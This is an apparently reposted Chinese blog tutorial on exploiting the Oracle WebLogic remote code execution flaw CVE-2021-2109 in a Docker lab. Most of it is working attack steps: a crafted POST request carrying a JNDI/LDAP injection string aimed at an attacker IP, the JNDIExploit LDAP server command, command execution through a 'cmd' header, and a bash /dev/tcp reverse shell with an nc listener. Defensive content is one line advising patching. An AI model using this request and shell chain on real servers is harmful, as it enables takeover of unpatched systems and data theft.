如何利用Weblogic Server远程代码执行CVE-2021-2109 漏洞反弹

发布时间:2021-12-28 20:16:22 作者:柒染
来源:亿速云 阅读:118

如何利用Weblogic Server远程代码执行CVE-2021-2109 漏洞反弹,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。

一、漏洞描述

2021年1月20日,Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器

影响版本

  1. WebLogic 3.6.0.0

  2. WebLogic 1.3.0.0

  3. WebLogic 2.1.3.0

  4. WebLogic 2.1.4.0

  5. WebLogic 1.1.0.0

环境搭建

攻击机(kali):192.168.159.131  靶机:192.168.159.139

这里使用docker来搭建环境

docker pull ismaleiva90/weblogic12

docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest

如何利用Weblogic Server远程代码执行CVE-2021-2109 漏洞反弹

访问http://your-ip:49163/console即可看到页面

如何利用Weblogic Server远程代码执行CVE-2021-2109 漏洞反弹

漏洞复现

使用burpsuit截取访问http://your-ip:49163/console报文,发送到repeater模块

1、将GET /console/console.portal?_nfpb=true HTTP/1.1修改为POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.159;131:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

请注意192.168.159;131地址的第三位后面为分号,192.168.159;131为启动LDAP服务的攻击机IP

2、在cookie上方添加“cmd:id”来获取靶机服务器id信息,如下图所示

如何利用Weblogic Server远程代码执行CVE-2021-2109 漏洞反弹

3、在攻击机上启动LDAP

下载地址:

https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11

java -jar JNDIExploit-v1.11.jar -i 192.168.159.131

如何利用Weblogic Server远程代码执行CVE-2021-2109 漏洞反弹

4、重放修改过的报文,成功获取到靶机上的id信息

如何利用Weblogic Server远程代码执行CVE-2021-2109 漏洞反弹

5、反弹shell

在http://www.jackson-t.ca/runtime-exec-payloads.html网站将bash -i >& /dev/tcp/192.168.159.131/2333 0>&1 进行base64编码

如何利用Weblogic Server远程代码执行CVE-2021-2109 漏洞反弹

将编码后的反弹shell命令复制到下图cmd后面进行重放,同时在攻击机上开启nc –lvvp 2333命令监听2333端口,点击发送

如何利用Weblogic Server远程代码执行CVE-2021-2109 漏洞反弹

成功反弹回shell

如何利用Weblogic Server远程代码执行CVE-2021-2109 漏洞反弹

修复建议

升级官方安全补丁

看完上述内容,你们掌握如何利用Weblogic Server远程代码执行CVE-2021-2109 漏洞反弹的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注亿速云行业资讯频道,感谢各位的阅读!

推荐阅读:
  1. redis未授权访问漏洞利用
  2. WebLogic反序列化漏洞导致getshell

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

weblogic server shell cve-2021-2109

上一篇:如何进行Microsoft Defender远程代码执行CVE-2021-1647漏洞分析

下一篇:如何进行Apache Flink路径遍历漏洞CVE-2020-17519复现

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》